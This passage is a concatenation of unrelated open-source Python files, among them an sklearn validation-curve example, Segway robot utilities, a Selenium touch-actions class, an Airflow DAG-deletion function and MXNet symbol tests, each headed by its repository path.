low. This is called underfitting. Medium values of gamma will result in high
values for both scores, i.e. the classifier is performing fairly well. If gamma
is too high, the classifier will overfit, which means that the training score
is good but the validation score is poor.
"""
print(__doc__)
import matplotlib.pyplot as plt
import numpy as np
from sklearn.datasets import load_digits
from sklearn.svm import SVC
from sklearn.learning_curve import validation_curve
digits = load_digits()
X, y = digits.data, digits.target
param_range = np.logspace(-6, -1, 5)
train_scores, test_scores = validation_curve(
SVC(), X, y, param_name="gamma", param_range=param_range,
cv=10, scoring="accuracy", n_jobs=1)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.title("Validation Curve with SVM")
plt.xlabel(r"$\gamma$")
plt.ylabel("Score")
plt.ylim(0.0, 1.1)
plt.semilogx(param_range, train_scores_mean, label="Training score", color="r")
plt.fill_between(param_range, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.2, color="r")
plt.semilogx(param_range, test_scores_mean, label="Cross-validation score",
color="g")
plt.fill_between(param_range, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.2, color="g")
plt.legend(loc="best")
plt.show()
|
iron-ox/segway_v3 | refs/heads/iron-master | segway_ros/src/segway/utils.py | 1 | """--------------------------------------------------------------------
COPYRIGHT 2014 Stanley Innovation Inc.
Software License Agreement:
The software supplied herewith by Stanley Innovation Inc. (the "Company")
for its licensed Segway RMP Robotic Platforms is intended and supplied to you,
the Company's customer, for use solely and exclusively with Stanley Innovation
products. The software is owned by the Company and/or its supplier, and is
protected under applicable copyright laws. All rights are reserved. Any use in
violation of the foregoing restrictions may subject the user to criminal
sanctions under applicable laws, as well as to civil liability for the
breach of the terms and conditions of this license. The Company may
immediately terminate this Agreement upon your use of the software with
any products that are not Stanley Innovation products.
The software was written using Python programming language. Your use
of the software is therefore subject to the terms and conditions of the
OSI- approved open source license viewable at http://www.python.org/.
You are solely responsible for ensuring your compliance with the Python
open source license.
You shall indemnify, defend and hold the Company harmless from any claims,
demands, liabilities or expenses, including reasonable attorneys fees, incurred
by the Company as a result of any claim or proceeding against the Company
arising out of or based upon:
(i) The combination, operation or use of the software by you with any hardware,
products, programs or data not supplied or approved in writing by the Company,
if such claim or proceeding would have been avoided but for such combination,
operation or use.
(ii) The modification of the software by or on behalf of you
(iii) Your use of the software.
THIS SOFTWARE IS PROVIDED IN AN "AS IS" CONDITION. NO WARRANTIES,
WHETHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING, BUT NOT LIMITED
TO, IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE APPLY TO THIS SOFTWARE. THE COMPANY SHALL NOT,
IN ANY CIRCUMSTANCES, BE LIABLE FOR SPECIAL, INCIDENTAL OR
CONSEQUENTIAL DAMAGES, FOR ANY REASON WHATSOEVER.
\file utils.py
\brief This module contains general utility functions
\Platform: Linux/ROS Indigo
--------------------------------------------------------------------"""
import struct
import socket
import math
import crc16
import array
from system_defines import *
"""
Slew limit function to limit the maximum rate of change
"""
def slew_limit(signal_in,signal_out,max_rate,dt):
if (0 == dt):
return
requested_rate = (signal_in - signal_out)/dt
if (requested_rate > max_rate):
signal_out += max_rate * dt
elif (requested_rate >= -max_rate):
signal_out = signal_in
else:
signal_out += -max_rate * dt
return signal_out
"""
Make a 16-bit value from two 8-bit values
"""
def m16(byte_array):
return (( byte_array[0] << 8) & 0xFF00) | (byte_array[1] & 0x00FF)
"""
Make a 32-bit value from four 8-bit values
"""
def m32(byte_array):
ret = 0;
ret |= (byte_array[0] & 0xFF) << 24
ret |= (byte_array[1] & 0xFF) << 16
ret |= (byte_array[2] & 0xFF) << 8
ret |= (byte_array[3] & 0xFF)
return ret
def generate_cmd_bytes(cmd):
cmd_bytes = []
add_bytes(cmd_bytes,cmd[0],16)
for cmd_var in cmd[1]:
add_bytes(cmd_bytes,cmd_var,32)
"""
Generate the CRC for the command bytes
"""
crc16.compute_buffer_crc(cmd_bytes)
return cmd_bytes
def validate_response(rsp):
"""
    Check the CRC and, if it is valid, return the response data with the trailing CRC word stripped
"""
data = array.array('B',rsp)
data = array.array('I',data.tostring())
final_data = data
rsp = array.array('B',data.tostring())
if (crc16.buffer_crc_is_valid(rsp)) and (len(rsp) > 0):
return True,final_data[:len(final_data)-1]
"""
Not a valid CRC
"""
return False,None
def add_bytes(list_to_append,var2,bits):
if bits % 2:
return False
bytes_to_make = bits/8
for i in range(0,bytes_to_make):
shift = bits - 8*(i+1)
list_to_append.append((var2 >> shift) & 0xFF)
"""
For IEEE754 processors this function converts a 32-bit floating point number to
a 32-bit integer representation
"""
def convert_float_to_u32(value):
return struct.unpack('=I', struct.pack('=f', value))[0]
"""
For IEEE754 processors this function converts a 32-bit integer representation
of a floating point value to float representation
"""
def convert_u32_to_float(bits):
return struct.unpack('=f', struct.pack('=I', bits))[0]
def convert_u64_to_double(high_word,low_word):
temp = (high_word << 32) & 0xFFFFFFFF00000000
temp |= (low_word & 0x00000000FFFFFFFF)
return struct.unpack('=d', struct.pack('=Q', temp))[0]
"""
Used to convert a byte array (string) into an array of 32-bit values
"""
def convert_byte_data_to_U32(data):
rx_dat = [];
k = 0;
#
# Convert the string into a byte array
#
for x in range(0,len(data)):
rx_dat.append(ord(data[x]));
number_of_u32s = (len(rx_dat)/4)
#
# Convert the byte array into an array of 32bit values
#
converted = [0]*number_of_u32s;
for x in range(0,number_of_u32s):
converted[x] = int((((rx_dat[k] << 24) & 0xFF000000)) |
(((rx_dat[k+1] << 16) & 0x00FF0000)) |
(((rx_dat[k+2] << 8) & 0x0000FF00)) |
(rx_dat[k+3] & 0x000000FF));
k+=4;
return converted;
"""
Used to convert an IP address string in dotted quad format to an integer
"""
def dottedQuadToNum(ip):
"convert decimal dotted quad string to long integer"
return struct.unpack('I',socket.inet_aton(ip))[0]
"""
Used to convert an IP address in integer format to a dotted quad string
"""
def numToDottedQuad(n):
"convert long int to dotted quad string"
return socket.inet_ntoa(struct.pack('I',n))
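"""
Symmetrically limit a signal to the range [-abs(limit), abs(limit)]
"""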
def limit_f(signal_in, limit):
if (signal_in > abs(limit)):
return abs(limit)
elif (signal_in <= -abs(limit)):
return -abs(limit)
else:
return signal_in
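"""
Clamp a value to the range [lower_limit, upper_limit]
"""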
def clamp_value_f(value,lower_limit,upper_limit):
if (value < lower_limit):
value = lower_limit;
elif (value > upper_limit):
value = upper_limit;
return value;
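"""
Return whichever input has the smaller absolute value
"""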
def minimum_f(input1,input2):
if (math.fabs(input1) > math.fabs(input2)):
return input2
return input1
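"""
Return True if the two inputs differ by no more than max_delta
"""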
def approx_equal(in_1,in_2,max_delta):
if abs(in_1 - in_2) <= max_delta :
return True
return False
|
vveliev/selenium | refs/heads/master | py/test/__init__.py | 2454 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
|
wbsavage/shinken | refs/heads/branch-1.4 | shinken/modules/pnp_ui.py | 1 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2012:
# Gabes Jean, [email protected]
# Gerhard Lausser, [email protected]
# Gregory Starck, [email protected]
# Hartmut Goebel, [email protected]
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
"""
This class links the WebUI with PNP,
mainly to get graphs and links.
"""
import socket
from shinken.log import logger
from shinken.basemodule import BaseModule
properties = {
'daemons': ['webui'],
'type': 'pnp_webui'
}
# called by the plugin manager
def get_instance(plugin):
logger.info("Get an PNP UI module for plugin %s" % plugin.get_name())
instance = PNP_Webui(plugin)
return instance
class PNP_Webui(BaseModule):
def __init__(self, modconf):
BaseModule.__init__(self, modconf)
self.uri = getattr(modconf, 'uri', None)
self.username = getattr(modconf, 'username', None)
self.password = getattr(modconf, 'password', '')
if not self.uri:
raise Exception('The WebUI PNP module is missing uri parameter.')
self.uri = self.uri.strip()
if not self.uri.endswith('/'):
self.uri += '/'
# Change YOURSERVERNAME by our server name if we got it
if 'YOURSERVERNAME' in self.uri:
my_name = socket.gethostname()
self.uri = self.uri.replace('YOURSERVERNAME', my_name)
    # Module initialization; PNP needs no connection to be set up here
def init(self):
pass
# To load the webui application
def load(self, app):
self.app = app
    # For an element, give the number of metrics in
    # its perf_data
def get_number_of_metrics(self, elt):
perf_data = elt.perf_data.strip()
elts = perf_data.split(' ')
elts = [e for e in elts if e != '']
return len(elts)
# Give the link for the PNP UI, with a Name
def get_external_ui_link(self):
return {'label': 'PNP4', 'uri': self.uri}
    # For a host or a service, return the graph URIs the UI should use
    # to get the graph image link and the PNP page link.
    # for now, the source variable does nothing. Values passed to this variable can be:
# 'detail' for the element detail page
# 'dashboard' for the dashboard widget
# you can customize the url depending on this value. (or not)
def get_graph_uris(self, elt, graphstart, graphend, source = 'detail'):
if not elt:
return []
t = elt.__class__.my_type
r = []
if t == 'host':
nb_metrics = self.get_number_of_metrics(elt)
for i in range(nb_metrics):
v = {}
v['link'] = self.uri + 'index.php/graph?host=%s&srv=_HOST_' % elt.get_name()
v['img_src'] = self.uri + 'index.php/image?host=%s&srv=_HOST_&view=0&source=%d&start=%d&end=%d' % (elt.get_name(), i, graphstart, graphend)
r.append(v)
return r
if t == 'service':
nb_metrics = self.get_number_of_metrics(elt)
for i in range(nb_metrics):
v = {}
v['link'] = self.uri + 'index.php/graph?host=%s&srv=%s' % (elt.host.host_name, elt.service_description)
v['img_src'] = self.uri + 'index.php/image?host=%s&srv=%s&view=0&source=%d&start=%d&end=%d' % (elt.host.host_name, elt.service_description, i, graphstart, graphend)
r.append(v)
return r
# Oups, bad type?
return []
|
tmxdyf/CouchPotatoServer | refs/heads/master | libs/sqlalchemy/connectors/mysqldb.py | 18 | """Define behaviors common to MySQLdb dialects.
Currently includes MySQL and Drizzle.
"""
from sqlalchemy.connectors import Connector
from sqlalchemy.engine import base as engine_base, default
from sqlalchemy.sql import operators as sql_operators
from sqlalchemy import exc, log, schema, sql, types as sqltypes, util
from sqlalchemy import processors
import re
# the subclassing of Connector by all classes
# here is not strictly necessary
class MySQLDBExecutionContext(Connector):
@property
def rowcount(self):
if hasattr(self, '_rowcount'):
return self._rowcount
else:
return self.cursor.rowcount
class MySQLDBCompiler(Connector):
def visit_mod(self, binary, **kw):
return self.process(binary.left) + " %% " + self.process(binary.right)
def post_process_text(self, text):
return text.replace('%', '%%')
class MySQLDBIdentifierPreparer(Connector):
def _escape_identifier(self, value):
value = value.replace(self.escape_quote, self.escape_to_quote)
return value.replace("%", "%%")
class MySQLDBConnector(Connector):
driver = 'mysqldb'
supports_unicode_statements = False
supports_sane_rowcount = True
supports_sane_multi_rowcount = True
supports_native_decimal = True
default_paramstyle = 'format'
@classmethod
def dbapi(cls):
# is overridden when pymysql is used
return __import__('MySQLdb')
def do_executemany(self, cursor, statement, parameters, context=None):
rowcount = cursor.executemany(statement, parameters)
if context is not None:
context._rowcount = rowcount
def create_connect_args(self, url):
opts = url.translate_connect_args(database='db', username='user',
password='passwd')
opts.update(url.query)
util.coerce_kw_type(opts, 'compress', bool)
util.coerce_kw_type(opts, 'connect_timeout', int)
util.coerce_kw_type(opts, 'read_timeout', int)
util.coerce_kw_type(opts, 'client_flag', int)
util.coerce_kw_type(opts, 'local_infile', int)
# Note: using either of the below will cause all strings to be returned
# as Unicode, both in raw SQL operations and with column types like
# String and MSString.
util.coerce_kw_type(opts, 'use_unicode', bool)
util.coerce_kw_type(opts, 'charset', str)
# Rich values 'cursorclass' and 'conv' are not supported via
# query string.
ssl = {}
for key in ['ssl_ca', 'ssl_key', 'ssl_cert', 'ssl_capath', 'ssl_cipher']:
if key in opts:
ssl[key[4:]] = opts[key]
util.coerce_kw_type(ssl, key[4:], str)
del opts[key]
if ssl:
opts['ssl'] = ssl
# FOUND_ROWS must be set in CLIENT_FLAGS to enable
# supports_sane_rowcount.
client_flag = opts.get('client_flag', 0)
if self.dbapi is not None:
try:
CLIENT_FLAGS = __import__(
self.dbapi.__name__ + '.constants.CLIENT'
).constants.CLIENT
client_flag |= CLIENT_FLAGS.FOUND_ROWS
except (AttributeError, ImportError):
self.supports_sane_rowcount = False
opts['client_flag'] = client_flag
return [[], opts]
def _get_server_version_info(self, connection):
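        # Parse the version string from the driver (e.g. '5.1.49-log') into a tuple, keeping non-numeric fragments as strings.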
dbapi_con = connection.connection
version = []
r = re.compile('[.\-]')
for n in r.split(dbapi_con.get_server_info()):
try:
version.append(int(n))
except ValueError:
version.append(n)
return tuple(version)
def _extract_error_code(self, exception):
return exception.args[0]
def _detect_charset(self, connection):
"""Sniff out the character set in use for connection results."""
# Note: MySQL-python 1.2.1c7 seems to ignore changes made
# on a connection via set_character_set()
if self.server_version_info < (4, 1, 0):
try:
return connection.connection.character_set_name()
except AttributeError:
# < 1.2.1 final MySQL-python drivers have no charset support.
# a query is needed.
pass
# Prefer 'character_set_results' for the current connection over the
# value in the driver. SET NAMES or individual variable SETs will
# change the charset without updating the driver's view of the world.
#
# If it's decided that issuing that sort of SQL leaves you SOL, then
# this can prefer the driver value.
rs = connection.execute("SHOW VARIABLES LIKE 'character_set%%'")
opts = dict([(row[0], row[1]) for row in self._compat_fetchall(rs)])
if 'character_set_results' in opts:
return opts['character_set_results']
try:
return connection.connection.character_set_name()
except AttributeError:
# Still no charset on < 1.2.1 final...
if 'character_set' in opts:
return opts['character_set']
else:
util.warn(
"Could not detect the connection character set with this "
"combination of MySQL server and MySQL-python. "
"MySQL-python >= 1.2.2 is recommended. Assuming latin1.")
return 'latin1'
|
zouyapeng/horizon | refs/heads/stable/juno | openstack_dashboard/dashboards/project/stacks/sro.py | 92 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.template.defaultfilters import title # noqa
from django.template.loader import render_to_string
from horizon.utils import filters
def stack_info(stack, stack_image):
stack.stack_status_desc = title(
filters.replace_underscores(stack.stack_status))
if stack.stack_status_reason:
stack.stack_status_reason = title(
filters.replace_underscores(stack.stack_status_reason)
)
context = {}
context['stack'] = stack
context['stack_image'] = stack_image
return render_to_string('project/stacks/_stack_info.html',
context)
def resource_info(resource):
resource.resource_status_desc = title(
filters.replace_underscores(resource.resource_status)
)
if resource.resource_status_reason:
resource.resource_status_reason = title(
filters.replace_underscores(resource.resource_status_reason)
)
context = {}
context['resource'] = resource
return render_to_string('project/stacks/_resource_info.html',
context)
|
Designist/audacity | refs/heads/master | lib-src/lv2/sord/waflib/Tools/fc_scan.py | 183 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import re
from waflib import Utils,Task,TaskGen,Logs
from waflib.TaskGen import feature,before_method,after_method,extension
from waflib.Configure import conf
INC_REGEX="""(?:^|['">]\s*;)\s*(?:|#\s*)INCLUDE\s+(?:\w+_)?[<"'](.+?)(?=["'>])"""
USE_REGEX="""(?:^|;)\s*USE(?:\s+|(?:(?:\s*,\s*(?:NON_)?INTRINSIC)?\s*::))\s*(\w+)"""
MOD_REGEX="""(?:^|;)\s*MODULE(?!\s*PROCEDURE)(?:\s+|(?:(?:\s*,\s*(?:NON_)?INTRINSIC)?\s*::))\s*(\w+)"""
re_inc=re.compile(INC_REGEX,re.I)
re_use=re.compile(USE_REGEX,re.I)
re_mod=re.compile(MOD_REGEX,re.I)
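# fortran_parser scans Fortran sources for INCLUDE directives, USE'd modules and MODULE definitions to collect dependency nodes and names.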
class fortran_parser(object):
def __init__(self,incpaths):
self.seen=[]
self.nodes=[]
self.names=[]
self.incpaths=incpaths
def find_deps(self,node):
txt=node.read()
incs=[]
uses=[]
mods=[]
for line in txt.splitlines():
m=re_inc.search(line)
if m:
incs.append(m.group(1))
m=re_use.search(line)
if m:
uses.append(m.group(1))
m=re_mod.search(line)
if m:
mods.append(m.group(1))
return(incs,uses,mods)
def start(self,node):
self.waiting=[node]
while self.waiting:
nd=self.waiting.pop(0)
self.iter(nd)
def iter(self,node):
path=node.abspath()
incs,uses,mods=self.find_deps(node)
for x in incs:
if x in self.seen:
continue
self.seen.append(x)
self.tryfind_header(x)
for x in uses:
name="USE@%s"%x
if not name in self.names:
self.names.append(name)
for x in mods:
name="MOD@%s"%x
if not name in self.names:
self.names.append(name)
def tryfind_header(self,filename):
found=None
for n in self.incpaths:
found=n.find_resource(filename)
if found:
self.nodes.append(found)
self.waiting.append(found)
break
if not found:
if not filename in self.names:
self.names.append(filename)
|
DinoCow/airflow | refs/heads/master | airflow/api/common/experimental/delete_dag.py | 8 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Delete DAGs APIs."""
import logging
from sqlalchemy import or_
from airflow import models
from airflow.exceptions import DagNotFound
from airflow.models import DagModel, TaskFail
from airflow.models.serialized_dag import SerializedDagModel
from airflow.utils.session import provide_session
log = logging.getLogger(__name__)
@provide_session
def delete_dag(dag_id: str, keep_records_in_log: bool = True, session=None) -> int:
"""
:param dag_id: the dag_id of the DAG to delete
:param keep_records_in_log: whether keep records of the given dag_id
in the Log table in the backend database (for reasons like auditing).
The default value is True.
:param session: session used
    :return: count of deleted dags
"""
log.info("Deleting DAG: %s", dag_id)
dag = session.query(DagModel).filter(DagModel.dag_id == dag_id).first()
if dag is None:
raise DagNotFound(f"Dag id {dag_id} not found")
# Scheduler removes DAGs without files from serialized_dag table every dag_dir_list_interval.
# There may be a lag, so explicitly removes serialized DAG here.
if SerializedDagModel.has_dag(dag_id=dag_id, session=session):
SerializedDagModel.remove_dag(dag_id=dag_id, session=session)
count = 0
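    # Delete rows from every mapped model that has a dag_id column; the Log table is skipped when keep_records_in_log is True.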
for model in models.base.Base._decl_class_registry.values(): # noqa pylint: disable=protected-access
if hasattr(model, "dag_id"):
if keep_records_in_log and model.__name__ == 'Log':
continue
cond = or_(model.dag_id == dag_id, model.dag_id.like(dag_id + ".%"))
count += session.query(model).filter(cond).delete(synchronize_session='fetch')
if dag.is_subdag:
parent_dag_id, task_id = dag_id.rsplit(".", 1)
for model in TaskFail, models.TaskInstance:
count += (
session.query(model).filter(model.dag_id == parent_dag_id, model.task_id == task_id).delete()
)
# Delete entries in Import Errors table for a deleted DAG
# This handles the case when the dag_id is changed in the file
session.query(models.ImportError).filter(models.ImportError.filename == dag.fileloc).delete(
synchronize_session='fetch'
)
return count
|
livioc/selenium | refs/heads/master | py/selenium/webdriver/common/touch_actions.py | 43 | """
The Touch Actions implementation
"""
from selenium.webdriver.remote.command import Command
class TouchActions(object):
"""
Generate touch actions. Works like ActionChains; actions are stored in the
TouchActions object and are fired with perform().
"""
def __init__(self, driver):
"""
Creates a new TouchActions object.
:Args:
- driver: The WebDriver instance which performs user actions.
It should be with touchscreen enabled.
"""
self._driver = driver
self._actions = []
def perform(self):
"""
Performs all stored actions.
"""
for action in self._actions:
action()
def tap(self, on_element):
"""
Taps on a given element.
:Args:
- on_element: The element to tap.
"""
self._actions.append(lambda:
self._driver.execute(Command.SINGLE_TAP, {'element': on_element.id}))
return self
def double_tap(self, on_element):
"""
Double taps on a given element.
:Args:
- on_element: The element to tap.
"""
self._actions.append(lambda:
self._driver.execute(Command.DOUBLE_TAP, {'element': on_element.id}))
return self
def tap_and_hold(self, xcoord, ycoord):
"""
Touch down at given coordinates.
:Args:
- xcoord: X Coordinate to touch down.
- ycoord: Y Coordinate to touch down.
"""
self._actions.append(lambda:
self._driver.execute(Command.TOUCH_DOWN, {
'x': int(xcoord),
'y': int(ycoord)}))
return self
def move(self, xcoord, ycoord):
"""
Move held tap to specified location.
:Args:
- xcoord: X Coordinate to move.
- ycoord: Y Coordinate to move.
"""
self._actions.append(lambda:
self._driver.execute(Command.TOUCH_MOVE, {
'x': int(xcoord),
'y': int(ycoord)}))
return self
def release(self, xcoord, ycoord):
"""
Release previously issued tap 'and hold' command at specified location.
:Args:
- xcoord: X Coordinate to release.
- ycoord: Y Coordinate to release.
"""
self._actions.append(lambda:
self._driver.execute(Command.TOUCH_UP, {
'x': int(xcoord),
'y': int(ycoord)}))
return self
def scroll(self, xoffset, yoffset):
"""
Touch and scroll, moving by xoffset and yoffset.
:Args:
- xoffset: X offset to scroll to.
- yoffset: Y offset to scroll to.
"""
self._actions.append(lambda:
self._driver.execute(Command.TOUCH_SCROLL, {
'xoffset': int(xoffset),
'yoffset': int(yoffset)}))
return self
def scroll_from_element(self, on_element, xoffset, yoffset):
"""
Touch and scroll starting at on_element, moving by xoffset and yoffset.
:Args:
- on_element: The element where scroll starts.
- xoffset: X offset to scroll to.
- yoffset: Y offset to scroll to.
"""
self._actions.append(lambda:
self._driver.execute(Command.TOUCH_SCROLL, {
'element': on_element.id,
'xoffset': int(xoffset),
'yoffset': int(yoffset)}))
return self
def long_press(self, on_element):
"""
Long press on an element.
:Args:
- on_element: The element to long press.
"""
self._actions.append(lambda:
self._driver.execute(Command.LONG_PRESS, {'element': on_element.id}))
return self
def flick(self, xspeed, yspeed):
"""
Flicks, starting anywhere on the screen.
:Args:
- xspeed: The X speed in pixels per second.
- yspeed: The Y speed in pixels per second.
"""
self._actions.append(lambda:
self._driver.execute(Command.FLICK, {
'xspeed': int(xspeed),
'yspeed': int(yspeed)}))
return self
def flick_element(self, on_element, xoffset, yoffset, speed):
"""
Flick starting at on_element, and moving by the xoffset and yoffset
with specified speed.
:Args:
- on_element: Flick will start at center of element.
- xoffset: X offset to flick to.
- yoffset: Y offset to flick to.
- speed: Pixels per second to flick.
"""
self._actions.append(lambda:
self._driver.execute(Command.FLICK, {
'element': on_element.id,
'xoffset': int(xoffset),
'yoffset': int(yoffset),
'speed': int(speed)}))
return self
    # Context manager so TouchActions can be used in 'with .. as' statements.
def __enter__(self):
return self # Return created instance of self.
def __exit__(self, _type, _value, _traceback):
pass # Do nothing, does not require additional cleanup. |
mitya57/debian-buildbot | refs/heads/master | buildbot/test/unit/test_util_ansicodes.py | 3 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from buildbot.util.ansicodes import parse_ansi_sgr
from twisted.trial import unittest
class TestAnsiCodes(unittest.TestCase):
def runTest(self, string, expected):
ret = parse_ansi_sgr(string)
self.assertEqual(ret, expected)
def test_ansi0m(self):
self.runTest("mfoo", ("foo", []))
def test_ansi1m(self):
self.runTest("33mfoo", ("foo", ["33"]))
def test_ansi2m(self):
self.runTest("1;33mfoo", ("foo", ["1", "33"]))
def test_ansi5m(self):
self.runTest("1;2;3;4;33mfoo", ("foo", ["1", "2", "3", "4", "33"]))
def test_ansi_notm(self):
self.runTest("33xfoo", ("foo", []))
def test_ansi_invalid(self):
self.runTest("<>foo", ("\033[<>foo", []))
def test_ansi_invalid_start_by_semicolon(self):
self.runTest(";3m", ("\033[;3m", []))
|
kaifabian/lana-dashboard | refs/heads/master | lana_dashboard/urls.py | 1 | """lana_dashboard URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from lana_dashboard.lana_api import urls as api_urls
from lana_dashboard.lana_data import urls as data_urls
from lana_dashboard.lana_generator import urls as generator_urls
from lana_dashboard.main import views as main
from lana_dashboard.usermanagement import urls as user_urls, views as usermanagement
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', main.index, name='main-index'),
url(r'^lana-apis.js', main.apis, name='main-apis'),
url(r'^login$', usermanagement.login, name='usermanagement-login'),
url(r'^logout$', usermanagement.logout, name='usermanagement-logout'),
url(r'^api/', include(api_urls, namespace='lana_api')),
url(r'^lana/', include(data_urls, namespace='lana_data')),
url(r'^config/', include(generator_urls, namespace='lana_generator')),
url(r'^users/', include(user_urls, namespace='usermanagement')),
]
|
ContinuumIO/quepy | refs/heads/master | tests/testapp/dsl.py | 9 | #!/usr/bin/env python
# coding: utf-8
# Copyright (c) 2012, Machinalis S.R.L.
# This file is part of quepy and is distributed under the Modified BSD License.
# You should have received a copy of license in the LICENSE file.
#
# Authors: Rafael Carrascosa <[email protected]>
# Gonzalo Garcia Berrotaran <[email protected]>
"""
Intermediate representation for testapp quepy.
"""
|
fullfanta/mxnet | refs/heads/master | tests/python/unittest/test_symbol.py | 2 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import copy
import os
import re
import mxnet as mx
import numpy as np
from common import assertRaises, models
from mxnet.base import NotImplementedForSymbol
from mxnet.test_utils import discard_stderr
import pickle as pkl
def test_symbol_basic():
mlist = []
mlist.append(models.mlp2())
for m in mlist:
m.list_arguments()
m.list_outputs()
def test_symbol_bool():
x = mx.symbol.Variable('x')
assertRaises(NotImplementedForSymbol, bool, x)
def test_symbol_compose():
data = mx.symbol.Variable('data')
net1 = mx.symbol.FullyConnected(data=data, name='fc1', num_hidden=10)
net1 = mx.symbol.FullyConnected(data=net1, name='fc2', num_hidden=100)
    assert net1.list_arguments() == ['data',
                                     'fc1_weight', 'fc1_bias',
                                     'fc2_weight', 'fc2_bias']
net2 = mx.symbol.FullyConnected(name='fc3', num_hidden=10)
net2 = mx.symbol.Activation(data=net2, act_type='relu')
net2 = mx.symbol.FullyConnected(data=net2, name='fc4', num_hidden=20)
composed = net2(fc3_data=net1, name='composed')
multi_out = mx.symbol.Group([composed, net1])
assert len(multi_out.list_outputs()) == 2
assert len(multi_out) == 2
def test_symbol_copy():
data = mx.symbol.Variable('data')
data_2 = copy.deepcopy(data)
data_3 = copy.copy(data)
assert data.tojson() == data_2.tojson()
assert data.tojson() == data_3.tojson()
def test_symbol_internal():
data = mx.symbol.Variable('data')
oldfc = mx.symbol.FullyConnected(data=data, name='fc1', num_hidden=10)
net1 = mx.symbol.FullyConnected(data=oldfc, name='fc2', num_hidden=100)
assert net1.list_arguments() == ['data', 'fc1_weight', 'fc1_bias', 'fc2_weight', 'fc2_bias']
internal = net1.get_internals()
fc1 = internal['fc1_output']
assert fc1.list_arguments() == oldfc.list_arguments()
def test_symbol_children():
data = mx.symbol.Variable('data')
oldfc = mx.symbol.FullyConnected(data=data, name='fc1', num_hidden=10)
net1 = mx.symbol.FullyConnected(data=oldfc, name='fc2', num_hidden=100)
assert net1.get_children().list_outputs() == ['fc1_output', 'fc2_weight', 'fc2_bias']
assert len(net1.get_children()) == 3
assert net1.get_children().get_children().list_outputs() == ['data', 'fc1_weight', 'fc1_bias']
assert len(net1.get_children().get_children()) == 3
assert net1.get_children()['fc2_weight'].list_arguments() == ['fc2_weight']
assert net1.get_children()['fc2_weight'].get_children() is None
data = mx.sym.Variable('data')
sliced = mx.sym.SliceChannel(data, num_outputs=3, name='slice')
concat = mx.sym.Concat(*list(sliced))
assert concat.get_children().list_outputs() == \
['slice_output0', 'slice_output1', 'slice_output2']
assert sliced.get_children().list_outputs() == ['data']
def test_symbol_pickle():
mlist = [models.mlp2(), models.conv()]
